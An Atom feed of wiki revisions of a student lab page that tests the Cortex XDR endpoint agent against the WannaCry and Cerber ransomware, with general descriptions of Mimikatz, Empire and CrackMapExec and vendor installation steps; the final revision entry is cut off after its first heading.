<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://elvis.hcw.ac.at/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=AAmmann</id>
	<title>Elvis Wiki - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://elvis.hcw.ac.at/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=AAmmann"/>
	<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php/Special:Contributions/AAmmann"/>
	<updated>2026-09-10T16:27:17Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.41.5</generator>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11473</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11473"/>
		<updated>2023-02-03T16:56:17Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Used Hardware */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== WannaCry Ransomware ===&lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
&lt;br /&gt;
=== Cortex XDR ===&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Mimikatz ===&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== BC-Security / Empire ===&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Porchetta-Industries / CrackMapExec ===&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
==Pentesting With Cortex XDR ==&lt;br /&gt;
&lt;br /&gt;
=== Installation ===&lt;br /&gt;
&lt;br /&gt;
 From Cortex XDR, select Endpoints → Agent Installations.&lt;br /&gt;
 Create a new installation package.&lt;br /&gt;
 Enter a unique Name and an optional Description to identify the installation package.&lt;br /&gt;
 Select the Package Type.&lt;br /&gt;
&lt;br /&gt;
Standalone Installers—Use for fresh installations and to Upgrade Cortex XDR Agents on a registered endpoint that is connected to Cortex XDR.&lt;br /&gt;
&lt;br /&gt;
Upgrade from ESM—Use this package to upgrade Traps agents which connect to the on-premises Traps Endpoint Security Manager to Cortex XDR. For more information, see Migrate from Traps Endpoint Security Manager.&lt;br /&gt;
&lt;br /&gt;
(Linux only) Kubernetes Installer—Use for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
Helm Installer—Use this package for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
 Specify the installation package settings.&lt;br /&gt;
 Create the installation package.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR prepares your installation package and makes it available on the Agent Installations page.&lt;br /&gt;
 Download your installation package.&lt;br /&gt;
&lt;br /&gt;
When the status of the package shows Completed, right-click the agent version, and click Download.&lt;br /&gt;
For Windows endpoints, select between the architecture type. You can download the installer msi file only, or for Cortex XDR agents 7.4 and later, a distribution package that includes both the installer msi file and the latest content zip. The distribution package is recommended to reduce the network load and time typically required for the initial roll-out or major upgrades of the Cortex XDR agent. To understand the benefits, workflow, and requirements to support this type of deployment, refer to the Cortex XDR Agent Administrator Guide.&lt;br /&gt;
&lt;br /&gt;
For macOS endpoints, download the ZIP installation folder and upload it to the endpoint. To deploy the Cortex XDR agent using JAMF, upload the ZIP folder to JAMF. Alternatively, to install the agent manually on the endpoint, unzip the ZIP folder and double-click the pkg file.&lt;br /&gt;
&lt;br /&gt;
For Linux endpoints, you can download .rpm or .deb installers (according to the endpoint Linux distribution), and deploy the installers on the endpoints using the Linux package manager. Alternatively, you can download a Shell installer and deploy it manually on the endpoint.&lt;br /&gt;
&lt;br /&gt;
=== Execution Phase ===&lt;br /&gt;
&lt;br /&gt;
We executed the WannaCry and Cerber Ransomware on our Endpoint where the Agent was installed. The Agent blocked the executions and uploaded the data to a webUI. On the WebUI, we were able to analyse the blocked attack and view the processes which would have been generated on a Sandbox called Wildfire.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Notebook&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Results ==&lt;br /&gt;
&lt;br /&gt;
Cortex XDR was able to prevent all attacks including the real ransomware execution mentioned in the &amp;quot;Ransomware&amp;quot; section. We got a precise analysis of processes which were considered abnormal or malicious. Cortex XDR recognizes behaviour related to known exploits which is then reported and blocked immediately.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
*https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/7.9/Cortex-XDR-Agent-Administrator-Guide&lt;br /&gt;
*https://github.com/gentilkiwi/mimikatz&lt;br /&gt;
*https://github.com/Porchetta-Industries/CrackMapExec&lt;br /&gt;
*https://github.com/BC-SECURITY/Empire&lt;br /&gt;
*https://www.avast.com/de-de/c-cerber#:~:text=Link%20kopiert-,Was%20ist%20die%20Cerber%20Ransomware%3F,Sie%20wird%20eine%20L%C3%B6segeldzahlung%20verlangt.&lt;br /&gt;
*https://de.wikipedia.org/wiki/WannaCry&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11472</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11472"/>
		<updated>2023-02-03T16:56:07Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Execution Phase */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== WannaCry Ransomware ===&lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
&lt;br /&gt;
=== Cortex XDR ===&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Mimikatz ===&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== BC-Security / Empire ===&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Porchetta-Industries / CrackMapExec ===&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
==Pentesting With Cortex XDR ==&lt;br /&gt;
&lt;br /&gt;
=== Installation ===&lt;br /&gt;
&lt;br /&gt;
 From Cortex XDR, select Endpoints → Agent Installations.&lt;br /&gt;
 Create a new installation package.&lt;br /&gt;
 Enter a unique Name and an optional Description to identify the installation package.&lt;br /&gt;
 Select the Package Type.&lt;br /&gt;
&lt;br /&gt;
Standalone Installers—Use for fresh installations and to Upgrade Cortex XDR Agents on a registered endpoint that is connected to Cortex XDR.&lt;br /&gt;
&lt;br /&gt;
Upgrade from ESM—Use this package to upgrade Traps agents which connect to the on-premises Traps Endpoint Security Manager to Cortex XDR. For more information, see Migrate from Traps Endpoint Security Manager.&lt;br /&gt;
&lt;br /&gt;
(Linux only) Kubernetes Installer—Use for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
Helm Installer—Use this package for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
 Specify the installation package settings.&lt;br /&gt;
 Create the installation package.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR prepares your installation package and makes it available on the Agent Installations page.&lt;br /&gt;
 Download your installation package.&lt;br /&gt;
&lt;br /&gt;
When the status of the package shows Completed, right-click the agent version, and click Download.&lt;br /&gt;
For Windows endpoints, select between the architecture type. You can download the installer msi file only, or for Cortex XDR agents 7.4 and later, a distribution package that includes both the installer msi file and the latest content zip. The distribution package is recommended to reduce the network load and time typically required for the initial roll-out or major upgrades of the Cortex XDR agent. To understand the benefits, workflow, and requirements to support this type of deployment, refer to the Cortex XDR Agent Administrator Guide.&lt;br /&gt;
&lt;br /&gt;
For macOS endpoints, download the ZIP installation folder and upload it to the endpoint. To deploy the Cortex XDR agent using JAMF, upload the ZIP folder to JAMF. Alternatively, to install the agent manually on the endpoint, unzip the ZIP folder and double-click the pkg file.&lt;br /&gt;
&lt;br /&gt;
For Linux endpoints, you can download .rpm or .deb installers (according to the endpoint Linux distribution), and deploy the installers on the endpoints using the Linux package manager. Alternatively, you can download a Shell installer and deploy it manually on the endpoint.&lt;br /&gt;
&lt;br /&gt;
=== Execution Phase ===&lt;br /&gt;
&lt;br /&gt;
We executed the WannaCry and Cerber Ransomware on our Endpoint where the Agent was installed. The Agent blocked the executions and uploaded the data to a webUI. On the WebUI, we were able to analyse the blocked attack and view the processes which would have been generated on a Sandbox called Wildfire.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
HP Notebook&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Results ==&lt;br /&gt;
&lt;br /&gt;
Cortex XDR was able to prevent all attacks including the real ransomware execution mentioned in the &amp;quot;Ransomware&amp;quot; section. We got a precise analysis of processes which were considered abnormal or malicious. Cortex XDR recognizes behaviour related to known exploits which is then reported and blocked immediately.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
*https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/7.9/Cortex-XDR-Agent-Administrator-Guide&lt;br /&gt;
*https://github.com/gentilkiwi/mimikatz&lt;br /&gt;
*https://github.com/Porchetta-Industries/CrackMapExec&lt;br /&gt;
*https://github.com/BC-SECURITY/Empire&lt;br /&gt;
*https://www.avast.com/de-de/c-cerber#:~:text=Link%20kopiert-,Was%20ist%20die%20Cerber%20Ransomware%3F,Sie%20wird%20eine%20L%C3%B6segeldzahlung%20verlangt.&lt;br /&gt;
*https://de.wikipedia.org/wiki/WannaCry&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11471</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11471"/>
		<updated>2023-02-03T16:55:54Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Execution Phase */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
